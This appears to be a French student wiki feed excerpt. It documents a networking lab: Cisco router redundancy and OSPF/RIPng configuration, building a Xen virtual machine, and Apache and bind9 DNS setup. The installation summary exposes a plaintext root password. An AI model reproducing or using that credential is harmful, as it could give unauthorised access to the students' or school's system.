   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51187</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51187"/>
				<updated>2019-11-25T19:52:31Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Configuration du VirtualHost Apache pour le protocole HTTPS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
